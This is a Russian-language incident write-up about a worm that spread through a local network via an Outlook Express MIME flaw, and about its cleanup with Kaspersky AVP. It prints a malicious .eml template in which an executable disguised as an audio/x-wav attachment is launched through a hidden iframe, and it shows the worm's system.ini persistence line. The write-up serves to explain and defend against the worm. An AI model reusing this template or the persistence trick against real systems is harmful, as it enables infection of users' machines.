Сетевой червь, использующий довольно старую дыру (21 марта) в Outlook Express, за несколько часов захватил всю локальную сеть. Задача очистки от вируса была сложной – предстояло очистить более 50 рабочих станций и два сервера от вируса, не нарушая их нормальной работы. Это значит, что нельзя было выключать их и закрывать доступ с одной на другую.

После запуска на одной машине он заражал все доступные по сети папки несколькими файлами формата *.eml и *.nws. Эти файлы (электронное письмо и сообщение новостей, соответственно) ассоциируются с программой Outlook Express. Благодаря этой ассоциации при
клике на файл он запускается на просмотр и, таким образом, выполняется. 

Причина этого в том, что компонент, отвечающий за просмотр почтовых сообщений, приспособлен для автоматического воспроизведения звуковых файлов. Вот как
могут выглядеть внутренности такого сообщения:

From: "coolhatsker"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
boundary="2"

--2
Content-Type: text/html;
charset="koi8-r"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
test
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
name="hello.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID> 

Далее должен идти exe-файл в кодировке base64. Кратко о кодировке: байты режутся на биты, склеиваются в шестибитовые блоки, каждый блок
соответствует своему символу ASCII. 

Outlook считает, что перед ним – wav-файл, и его нужно включить на воспроизведение. Файл распаковывается во временную папку с именем hello.exe (а в вирусе – readme.exe) и запускается. При запуске учитывается не тот формат, который был указан в письме, а тот, который соответствует расширению файла, то есть файл запускается на выполнение. Так он заражает
всю локальную сеть. Иногда файлы попадали в папку “автозагрузка”, и вирус активизировался еще и при перезагрузке компьютера.

Кроме того, иногда вирус создает файл load.exe и прописывает его в system.ini:

Shell=…. Load.exe –dontrunold

Еще вирус создает во многих папках инфицированные файлы riched20.dll, заражает другие исполнимые файлы – в общем, делает много непристойностей.

Для остановки эпидемии в локальной сети использовался свежий антивирус
Касперского AVP. Очищать компьютеры от вирусов по одиночке было невозможно, так как они сразу же заражались от соседних.

Установка AVP-монитора привела к тому, что вирус, хотя и находился на каждой машине в количестве нескольких тысяч файлов и размножающийся самыми различными способами, был неспособен функционировать, так как AVP Monitor проверяет файлы перед открытием, и таким образом, не позволяет вирусу активизироваться никаким путем.

После того как вирус был лишен жизнеспособности, можно было приступать к поочередной очистке всех машин от вируса. Для этого использовался AVP Scanner с опциями: без эвристического анализа (мы ведь ищем конкретный вирус), зараженные лечить, если не получается – удалять.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии